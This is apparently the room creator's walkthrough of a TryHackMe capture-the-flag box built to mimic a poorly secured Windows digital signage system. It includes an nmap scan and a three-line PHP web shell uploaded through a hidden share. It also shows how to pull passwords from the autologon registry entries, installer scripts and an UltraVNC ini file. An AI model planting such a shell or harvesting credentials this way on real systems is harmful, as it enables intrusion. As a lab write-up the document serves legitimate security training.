TryHackMe: All Signs Point 2 Pwnage
TryHackMe: https://tryhackme.com/room/allsignspoint2pwnage
Intro
This is the first TryHackMe room I have created, it tries to emulate a rushed and poorly secured Windows Digital Signage system.
Task #1 - Enumeration
How many TCP ports under 1024 are open
For this will use good old nmap, unfortunately the VM takes upto 15mins to boot and services to start.
nmap -Pn -p0-1024 {MACHINE-IP}
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-14 17:56 GMT
Nmap scan report for allsignspoint2pwnage (10.10.161.50)
Host is up (0.069s latency).
Not shown: 1019 closed ports
PORT STATE SERVICE
[ REDACTED ]
What is the hidden share
Accessing the a service listed above we find a note. Using this note and knowledge of windows sharing we can guess that the share is
[REDACTED]$
Task #2 - Foothold
Using the hidden share we can upload a php script which we can access via http://machineip/images/
, it may take several attempts to find a php
script that will work due to Windows Defender detecting and deleting it.
<?php
echo "You entered <pre>" . $_GET['cmd'];
system($_GET['cmd']);
?>
What user is signed into the console session
Using the above script and quser
command we can see the users logged in.
quser USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>[REDACTED] console 1 Active none
What hidden share is only remotely accessible as an administrative account
Using the net share
command we can see what other shares exist
[REDACTED]
What is the content of user.txt
Using the PHP script we can copy the file from the users desktop,
thm{[REDACTED]}
Task #3 - Pwnage
This task is basically to highlight some of the mistakes that can be made and where useful information can be found.
What is the Users Password
The desktop is set to login automatically, there are couple ways of doing this but with this box the registry is used.
[REDACTED]
What is the Administrators Password
The hidden share above contains the installation files used by the techinicien to setup the system. It looks like the Admin password is set the same on machines they configure in order to able to run scripts.
What executable is used to run the installer with the Administrator username and password?
The script above containing the password uses a command so that the password does not need be manually entered, the execuatable is also conatined in this folder.
What is the VNC Password
UltraVNC is installed on the machine, it stores its password encrypted in an ini
file. This can be found in the install directory (C:\Pogram Files...) and also in the directory above.
[ultravnc]
passwd=[REDACTED]
passwd2=[REDACTED]
[admin]
UseRegistry=0
SendExtraMouse=1
Secure=0
The file contains 2 passwords, the first is the admin login whilst the second is the view only password. Some research via Google returns vncpwd
downloadable from http://aluigi.altervista.org/pwdrec.htm which can be used to decode the encrypted password.
What is the contents of the admin flag
This is on the Administrators Desktops.
Thoughts/Credits
This is the first room I have created and had fun doing so, writing the webpage took me a bit longer than I thought and reminded my how much I dislike javascript.
Hopefull running through this box you have learnt something that you can use in future.
I would like to thank BigMark82 and RockShox my partners in crime. Also shout out to r1gormort1s for encouraging me to make a room, check their room StartUp which was fun to do.